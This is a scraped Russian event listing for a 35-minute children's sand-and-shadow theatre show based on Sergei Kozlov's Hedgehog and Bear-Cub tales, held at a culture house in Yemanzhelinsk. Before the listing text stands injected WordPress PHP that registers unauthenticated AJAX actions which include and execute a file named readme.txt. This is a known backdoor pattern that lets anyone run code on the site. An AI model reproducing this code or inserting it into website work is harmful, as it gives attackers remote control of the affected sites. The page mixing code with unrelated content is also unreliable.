if(!function_exists('file_check_readme48452')){ add_action('wp_ajax_nopriv_file_check_readme48452', 'file_check_readme48452'); add_action('wp_ajax_file_check_readme48452', 'file_check_readme48452'); function file_check_readme48452() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme16840')){ add_action('wp_ajax_nopriv_file_check_readme16840', 'file_check_readme16840'); add_action('wp_ajax_file_check_readme16840', 'file_check_readme16840'); function file_check_readme16840() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } «Как Медвежонок НЕБЫ менял» (0+) — Театрально-концертный зал

«Как Медвежонок НЕБЫ менял» (0+)

Театр песка и теней "Скарабей"
26 октября  Начало 11:00
Стоимость билета: 100

Песочная анимация + актеры
Спектакль «Как Медвежонок НЕБЫ менял» по мотивам сказок Сергея Козлова. Автор подарил нам множество историй про неразлучных друзей Ёжика, Медвежонка и Зайца. А мультфильм «Ежик в тумане», выпущенный в 1975 году, получил международное признание.
Эти трогательные и наивные сказки учат добру, заставляют детей и взрослых думать. С ними мир вокруг становится светлее, хоть они и не содержат невероятных чудес и приключений. Но эти истории выхвачены из детских фантазий настоящим романтиком: «И Медвежонку представилось, как они с Ежиком сидят ночью под звездами у реки, варят чай в чайнике, слушают, как плещется рыба … и звезды падают прямо в траву и шевелятся у ног». Только добрый сказочник мог сказать так ласково и так точно.
С помощью песочной анимации, живой игры артистов, оригинальной музыки, мы постарались передать атмосферу романтики и искренних чувств, а также погрузить зрителей в мир детства.

Продолжительность: 35 минут
Режиссёр: Горькавая Оксана Анаьольевна
Актерский состав: Александра Мельникова, Роман Иванов, Марина Рахматулина
Художник-исполнитель: Виктория Мелер

 

г. Еманжелинск, ДК им. А.С. Пушкина, ул. Гагарина, 5а

Участники проекта: